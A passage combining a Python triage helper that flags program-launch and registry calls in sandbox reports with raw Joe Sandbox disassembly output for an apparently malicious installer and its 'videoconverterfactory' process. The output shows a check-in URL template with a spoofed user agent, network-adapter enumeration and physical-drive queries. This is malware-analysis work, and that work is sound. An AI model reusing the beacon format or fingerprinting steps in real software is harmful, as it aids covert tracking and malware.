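    """(ref, reason) for each call a triager should open in the disassembly."""
    findings = []
    for c in calls:
        if c.api in LAUNCH_APIS:
            reason = f"{c.api}: launches a program"
            # ShellExecuteA(hwnd, lpOperation, lpFile, ...): the verb is argument 2.
            # ShellExecuteEx takes one pointer, so there is no verb on the stack.
            if c.api.startswith("ShellExecute") and not c.api.startswith("ShellExecuteEx") \
                    and len(c.args) > 1:
                reason += f" (verb={c.args[1]})"
            findings.append((c.ref, reason))
        elif c.api.startswith("RegOpenKeyEx") and len(c.args) > 1 and c.args[0] in HKEYS:
            findings.append((c.ref, f"{c.api}: opens {HKEYS[c.args[0]]}\\{c.args[1]}"))
    return findings


# Constructed excerpt: lines copied from the function records above, not a full report.
SAMPLE = r"""
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(?,00478F7E,?,?,00000001,00000000,00000000,00478F99), ref: 00478F67
APIs
• SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501FD
• ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045022E
APIs
• ShellExecuteEx.SHELL32(0000003C), ref: 0045532C
• GetLastError.KERNEL32(0000003C,00000000,00455375,?,?,?), ref: 0045533D
  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
APIs
• RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
"""

if __name__ == "__main__":
    for ref, reason in flag_calls(parse_api_lines(SAMPLE)):
        print(ref, reason)
```

Two caveats when reading the flagged lines back against the disassembly. The arguments the report prints are whatever sat on the stack at the call, not decoded structures: the lone 0000003C passed to ShellExecuteEx is 60, the cbSize of a 32-bit SHELLEXECUTEINFOA, so the verb, file and parameters live in that structure and only show up in the dump, not in this table. And a "Part of subcall function" entry belongs to the callee, so its ref (0042DE38 here) is inside function 0042DE1C, not inside the record that lists it.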
                                                                                                      APIs
                                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000,00496443), ref: 0049640E
                                                                                                      • CloseHandle.KERNEL32(004964A8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000), ref: 00496425
                                                                                                        • Part of subcall function 004962F8: GetLastError.KERNEL32(00000000,00496390,?,?,?,?), ref: 0049631C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateErrorHandleLastProcess
                                                                                                      • String ID: 0nI
                                                                                                      • API String ID: 3798668922-794067871
                                                                                                      • Opcode ID: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                                      • Instruction ID: 4379268ebcebee96409867e54b2437a6ba0b21f89d1dc4ba20584320bf55fb87
                                                                                                      • Opcode Fuzzy Hash: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                                      • Instruction Fuzzy Hash: 840182B1644248AFDB00EBD1DC42A9EBBACDF08704F51403AB904E7281D6785E008A2D
                                                                                                      APIs
                                                                                                      • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD78
                                                                                                      • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value$EnumQuery
                                                                                                      • String ID: Inno Setup: No Icons
                                                                                                      • API String ID: 1576479698-2016326496
                                                                                                      • Opcode ID: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                                      • Instruction ID: 8d080c6700cf8453afd411d185ff7d2dd707f59376968ad674d2e7d16536e1ed
                                                                                                      • Opcode Fuzzy Hash: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                                      • Instruction Fuzzy Hash: 1B012B33B55B7179FB3045256D01F7B57889B82B60F64013BF942EA2C0D6999C04936E
                                                                                                      APIs
                                                                                                      • SetFileAttributesA.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452EC3
                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452ECB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesErrorFileLast
                                                                                                      • String ID: T$H
                                                                                                      • API String ID: 1799206407-488339322
                                                                                                      • Opcode ID: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                                      • Instruction ID: d2ab7b9b66ca24062e77e49c95e81f13ab46b8af1b1b2eb811bbb53637dcbd2b
                                                                                                      • Opcode Fuzzy Hash: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                                      • Instruction Fuzzy Hash: 86F0F971A04204AB8B01DB7A9D4249EB7ECEB8A32171045BBFC04E3642E7B84E048558
                                                                                                      APIs
                                                                                                      • DeleteFileA.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 0045293F
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 00452947
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DeleteErrorFileLast
                                                                                                      • String ID: T$H
                                                                                                      • API String ID: 2018770650-488339322
                                                                                                      • Opcode ID: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                                                                      • Instruction ID: a1d21d86fbcf93c7076efe682877c1f84c37cf58088428800e153654eea74c02
                                                                                                      • Opcode Fuzzy Hash: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                                                                      • Instruction Fuzzy Hash: 05F0C2B2B04608ABDB01EFB59D414AEB7E8EB4E315B6045B7FC04E3742E6B85E148598
                                                                                                      APIs
                                                                                                      • RemoveDirectoryA.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E47
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E4F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DirectoryErrorLastRemove
                                                                                                      • String ID: T$H
                                                                                                      • API String ID: 377330604-488339322
                                                                                                      • Opcode ID: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                                      • Instruction ID: a8b2bafe79397aca91686f8656b478e2385adfe3b855dfce5f6cc0b9ba314abc
                                                                                                      • Opcode Fuzzy Hash: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                                      • Instruction Fuzzy Hash: 70F0FC71A04708AFCF01EF759D4249EB7E8DB4E31575049B7FC14E3642E7785E048598
                                                                                                      APIs
                                                                                                        • Part of subcall function 0047D0CC: FreeLibrary.KERNEL32(740E0000,00481A2F), ref: 0047D0E2
                                                                                                        • Part of subcall function 0047CD9C: GetTickCount.KERNEL32 ref: 0047CDE6
                                                                                                        • Part of subcall function 00457294: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004572B3
                                                                                                      • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049895B), ref: 00498059
                                                                                                      • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049895B), ref: 0049805F
                                                                                                      Strings
                                                                                                      • Detected restart. Removing temporary directory., xrefs: 00498013
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                                      • String ID: Detected restart. Removing temporary directory.
                                                                                                      • API String ID: 1717587489-3199836293
                                                                                                      • Opcode ID: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                                      • Instruction ID: bb05712aa7eb36d303e19ffab6eef2c78f2a463723ea7eca767f41585c441369
                                                                                                      • Opcode Fuzzy Hash: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                                      • Instruction Fuzzy Hash: BDE0E532208A406DDA1177BABC1396B7F5CDB46768B22487FF50882552D92D481CC53D
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1458359878-0
                                                                                                      • Opcode ID: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                                                                      • Instruction ID: f31041694d7e6b08a2ea33ec2b58b28b25921f40701f973673b956735a8b67d8
                                                                                                      • Opcode Fuzzy Hash: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                                                                      • Instruction Fuzzy Hash: 42F02B32705F58A78B21B56A889157FB2A8DB81366750012BFC0CD7313C878CC058BBC

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:3.1%
                                                                                                      Dynamic/Decrypted Code Coverage:67.2%
                                                                                                      Signature Coverage:18.7%
                                                                                                      Total number of Nodes:481
                                                                                                      Total number of Limit Nodes:28
                                                                                                      execution_graph 61764 402a20 GetVersion 61788 403b64 HeapCreate 61764->61788 61766 402a7f 61767 402a84 61766->61767 61768 402a8c 61766->61768 61863 402b3b 8 API calls 61767->61863 61800 403844 61768->61800 61772 402a94 GetCommandLineA 61814 403712 61772->61814 61776 402aae 61846 40340c 61776->61846 61778 402ab3 61779 402ab8 GetStartupInfoA 61778->61779 61859 4033b4 61779->61859 61781 402aca GetModuleHandleA 61783 402aee 61781->61783 61864 40315b GetCurrentProcess TerminateProcess ExitProcess 61783->61864 61785 402af7 61865 403230 UnhandledExceptionFilter 61785->61865 61787 402b08 61789 403b84 61788->61789 61790 403bba 61788->61790 61866 403a1c 19 API calls 61789->61866 61790->61766 61792 403b89 61793 403ba0 61792->61793 61794 403b93 61792->61794 61796 403bbd 61793->61796 61868 40478c HeapAlloc VirtualAlloc VirtualAlloc VirtualFree HeapFree 61793->61868 61867 403f3b HeapAlloc 61794->61867 61796->61766 61797 403b9d 61797->61796 61799 403bae HeapDestroy 61797->61799 61799->61790 61869 402b5f 61800->61869 61803 403863 GetStartupInfoA 61810 403974 61803->61810 61813 4038af 61803->61813 61806 40399b GetStdHandle 61809 4039a9 GetFileType 61806->61809 61806->61810 61807 4039db SetHandleCount 61807->61772 61808 402b5f 12 API calls 61808->61813 61809->61810 61810->61806 61810->61807 61811 403920 61811->61810 61812 403942 GetFileType 61811->61812 61812->61811 61813->61808 61813->61810 61813->61811 61815 403760 61814->61815 61816 40372d GetEnvironmentStringsW 61814->61816 61817 403735 61815->61817 61818 403751 61815->61818 61816->61817 61819 403741 GetEnvironmentStrings 61816->61819 61821 403779 WideCharToMultiByte 61817->61821 61822 40376d GetEnvironmentStringsW 61817->61822 61820 402aa4 61818->61820 61823 4037f3 GetEnvironmentStrings 61818->61823 61824 4037ff 61818->61824 61819->61818 61819->61820 61837 4034c5 61820->61837 61826 4037ad 61821->61826 61827 4037df 
FreeEnvironmentStringsW 61821->61827 61822->61820 61822->61821 61823->61820 61823->61824 61828 402b5f 12 API calls 61824->61828 61829 402b5f 12 API calls 61826->61829 61827->61820 61835 40381a 61828->61835 61830 4037b3 61829->61830 61830->61827 61831 4037bc WideCharToMultiByte 61830->61831 61833 4037d6 61831->61833 61834 4037cd 61831->61834 61832 403830 FreeEnvironmentStringsA 61832->61820 61833->61827 61878 402c11 61834->61878 61835->61832 61838 4034d7 61837->61838 61839 4034dc GetModuleFileNameA 61837->61839 61891 405d24 19 API calls 61838->61891 61841 4034ff 61839->61841 61842 402b5f 12 API calls 61841->61842 61843 403520 61842->61843 61844 403530 61843->61844 61892 402b16 7 API calls 61843->61892 61844->61776 61847 403419 61846->61847 61849 40341e 61846->61849 61893 405d24 19 API calls 61847->61893 61850 402b5f 12 API calls 61849->61850 61851 40344b 61850->61851 61858 40345f 61851->61858 61894 402b16 7 API calls 61851->61894 61852 4034a2 61854 402c11 7 API calls 61852->61854 61855 4034ae 61854->61855 61855->61778 61856 402b5f 12 API calls 61856->61858 61858->61852 61858->61856 61895 402b16 7 API calls 61858->61895 61860 4033bd 61859->61860 61862 4033c2 61859->61862 61896 405d24 19 API calls 61860->61896 61862->61781 61864->61785 61865->61787 61866->61792 61867->61797 61868->61797 61873 402b71 61869->61873 61872 402b16 7 API calls 61872->61803 61874 402b6e 61873->61874 61876 402b78 61873->61876 61874->61803 61874->61872 61876->61874 61877 402b9d 12 API calls 61876->61877 61877->61876 61879 402c39 61878->61879 61880 402c1d 61878->61880 61879->61833 61881 402c27 61880->61881 61882 402c3d 61880->61882 61884 402c69 HeapFree 61881->61884 61885 402c33 61881->61885 61883 402c68 61882->61883 61887 402c57 61882->61887 61883->61884 61884->61879 61889 403fae VirtualFree VirtualFree HeapFree 61885->61889 61890 404a3f VirtualFree HeapFree VirtualFree 61887->61890 61889->61879 61890->61879 61891->61839 61892->61844 61893->61849 61894->61858 61895->61858 61896->61862 61386 
[Function call graph rendering residue (Joe Sandbox IDA Plugin call graph; the node/edge list is not reproduced). Windows API calls on the graph's function nodes: LoadLibraryExA, LoadLibraryA, GetProcAddress, FreeLibrary, GetModuleHandleA, GetModuleHandleExW, GetModuleFileNameA, CreateDirectoryA, CopyFileA, CreateFileA, ReadFile, DeviceIoControl, CloseHandle, FindResourceA, SizeofResource, LoadResource, LockResource, GlobalAlloc, VirtualAlloc, GetProcessHeap, RtlAllocateHeap, HeapFree, OpenSCManagerA, CreateServiceA, CloseServiceHandle, RegOpenKeyExA, RegCreateKeyExA, RegQueryValueExA, RegSetValueExA, RegCloseKey, SHGetSpecialFolderPathA, GetAdaptersInfo, WSAStartup, GetStartupInfoA, GetStartupInfoW, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, WideCharToMultiByte, GetStdHandle, GetFileType, GetVersionExA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, Sleep, GetLastError, RtlInitializeCriticalSection, RtlEnterCriticalSection, RtlLeaveCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, RtlEncodePointer, RtlDecodePointer, InterlockedIncrement, InterlockedExchange, lstrcmpiW, RaiseException, ExitProcess, plus CRT internals (_malloc, _free, _memset, _sprintf, _swscanf, _strtok, __CRT_INIT@12, _doexit).]

                                                                                                      Control-flow Graph

                                                                                                      [Control-flow graph rendering residue for the function at 2d25e5f (executed/not-executed block colouring is not recoverable in text). API calls on its basic blocks: RtlInitializeCriticalSection, GetModuleHandleA, GetProcAddress, GetTickCount, GetVersionExA, GetProcessHeap, RtlAllocateHeap, RtlEnterCriticalSection, RtlLeaveCriticalSection, QueryPerformanceCounter, Sleep; subcalls include 2d242c7, 2d259fa, 2d33760, 2d31fbc, 2d2439c, 2d3134c, 2d25c12, 2d31428, 2d21ba7, 2d23c67, 2d23d7e, 2d27340, 2d325f6, 2d31f84, 2d2972a, 2d28008, 2d273ef, 2d233b2, 2d327c5, 2d2873c, 2d31860, 2d29854, 2d25119, 2d29c14, 2d2c11c, 2d2380b, 2d30900, 2d24100.]
                                                                                                      APIs
                                                                                                      • RtlInitializeCriticalSection.NTDLL(02D54FD0), ref: 02D25E93
                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02D25EAA
                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 02D25EB3
                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02D25EC2
                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 02D25EC5
                                                                                                      • GetTickCount.KERNEL32 ref: 02D25ED9
                                                                                                        • Part of subcall function 02D259FA: _malloc.LIBCMT ref: 02D25A08
                                                                                                      • GetVersionExA.KERNEL32(02D54E20), ref: 02D25F06
                                                                                                      • _memset.LIBCMT ref: 02D25F25
                                                                                                      • _malloc.LIBCMT ref: 02D25F32
                                                                                                        • Part of subcall function 02D31FBC: __FF_MSGBANNER.LIBCMT ref: 02D31FD3
                                                                                                        • Part of subcall function 02D31FBC: __NMSG_WRITE.LIBCMT ref: 02D31FDA
                                                                                                        • Part of subcall function 02D31FBC: RtlAllocateHeap.NTDLL(00700000,00000000,00000001), ref: 02D31FFF
                                                                                                      • _malloc.LIBCMT ref: 02D25F42
                                                                                                      • _malloc.LIBCMT ref: 02D25F4D
                                                                                                      • _malloc.LIBCMT ref: 02D25F58
                                                                                                      • _malloc.LIBCMT ref: 02D25F63
                                                                                                      • _malloc.LIBCMT ref: 02D25F6E
                                                                                                      • _malloc.LIBCMT ref: 02D25F79
                                                                                                      • _malloc.LIBCMT ref: 02D25F85
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02D25F9C
                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02D25FA5
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D25FB1
                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02D25FB4
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D25FBF
                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02D25FC2
                                                                                                      • _memset.LIBCMT ref: 02D25FD2
                                                                                                      • _memset.LIBCMT ref: 02D25FDE
                                                                                                      • _memset.LIBCMT ref: 02D25FEB
                                                                                                      • RtlEnterCriticalSection.NTDLL(02D54FD0), ref: 02D25FF9
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02D54FD0), ref: 02D26006
                                                                                                      • _malloc.LIBCMT ref: 02D26027
                                                                                                      • _malloc.LIBCMT ref: 02D26035
                                                                                                      • _malloc.LIBCMT ref: 02D2603C
                                                                                                      • _malloc.LIBCMT ref: 02D2605D
                                                                                                      • QueryPerformanceCounter.KERNEL32(00000200), ref: 02D26069
                                                                                                      • Sleep.KERNELBASE(00000000), ref: 02D26077
                                                                                                      • _malloc.LIBCMT ref: 02D26083
                                                                                                      • _malloc.LIBCMT ref: 02D26093
                                                                                                      • _memset.LIBCMT ref: 02D260A8
                                                                                                      • _memset.LIBCMT ref: 02D260B8
                                                                                                      • Sleep.KERNELBASE(0000EA60), ref: 02D26105
                                                                                                      • RtlEnterCriticalSection.NTDLL(02D54FD0), ref: 02D26110
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02D54FD0), ref: 02D26121
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _malloc$Heap$_memset$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                                      • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
                                                                                                      • API String ID: 1856495841-1038016512
                                                                                                      • Opcode ID: 61650bf159b33983e421a10d7c94c4fe94b47da5186889e4902744464d0d9d2f
                                                                                                      • Instruction ID: 464e5b7639f8cd6b097f9b9d0631fabd65090baee24a13c7850f511ccfdb1cbc
                                                                                                      • Opcode Fuzzy Hash: 61650bf159b33983e421a10d7c94c4fe94b47da5186889e4902744464d0d9d2f
                                                                                                      • Instruction Fuzzy Hash: ED71BDB5D48350ABD711AF78A809B5BBBE8EF55304F10091DF68897381DBF49C548BA2

                                                                                                      Control-flow Graph

                                                                                                      [Control-flow graph rendering residue for the function at 2d2e9ac-2d2ea96 (executed/not-executed block colouring is not recoverable in text). API calls on its basic blocks: LoadLibraryA, GetProcAddress, GetAdaptersInfo, FreeLibrary; subcalls 2d326df, 2d2e6fb, 2d327c5.]
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 02D2E9C2
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02D2E9DB
                                                                                                      • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02D2EA00
                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 02D2EA89
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                                      • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                                      • API String ID: 514930453-3114217049
                                                                                                      • Opcode ID: d8b77c78774f95a046b7d1223febc08a6810f6949f75067e169fc17e7c0a01f5
                                                                                                      • Instruction ID: 65440631f31ae55ddb7d17867015aed96d5607c437bd91414ed52154d5c7e1ac
                                                                                                      • Opcode Fuzzy Hash: d8b77c78774f95a046b7d1223febc08a6810f6949f75067e169fc17e7c0a01f5
                                                                                                      • Instruction Fuzzy Hash: FF21D575E082699BDB10DFA8D8847EEBBF8BF15308F1400A9E544E7301DB30AD49CBA4

                                                                                                      Control-flow Graph

                                                                                                      [Control-flow graph rendering residue for the function at 2d22b95-2d22d38 (executed/not-executed block colouring is not recoverable in text). API calls on its basic blocks: WSASetLastError, WSARecv, select; subcalls 2d2fb20, 2d2950e, 2d2166f, 2d21996.]
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02D22BE4
                                                                                                      • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02D22C07
                                                                                                        • Part of subcall function 02D2950E: WSAGetLastError.WS2_32(00000000,?,?,02D22A51), ref: 02D2951C
                                                                                                      • WSASetLastError.WS2_32 ref: 02D22CD3
                                                                                                      • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02D22CE7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$Recvselect
                                                                                                      • String ID: 3'
                                                                                                      • API String ID: 886190287-280543908
                                                                                                      • Opcode ID: aabe8059247f0339ca3c32ec361d1cd4ae8d01b6090ce5f827327ffb13594332
                                                                                                      • Instruction ID: 312d3cafebe8cd5becaa1569391d317265b9857af51bac11dc378fd38d3b97aa
                                                                                                      • Opcode Fuzzy Hash: aabe8059247f0339ca3c32ec361d1cd4ae8d01b6090ce5f827327ffb13594332
                                                                                                      • Instruction Fuzzy Hash: 93414BB19083118FD7109F64C4187ABBBE9EFA4758F10491EB89587784EB74DD48CBA1

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02D2E8C7
                                                                                                      • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02D2E905
                                                                                                      • GetLastError.KERNEL32 ref: 02D2E966
                                                                                                      • CloseHandle.KERNELBASE(?), ref: 02D2E99D
                                                                                                      Strings
                                                                                                      Memory Dump Source
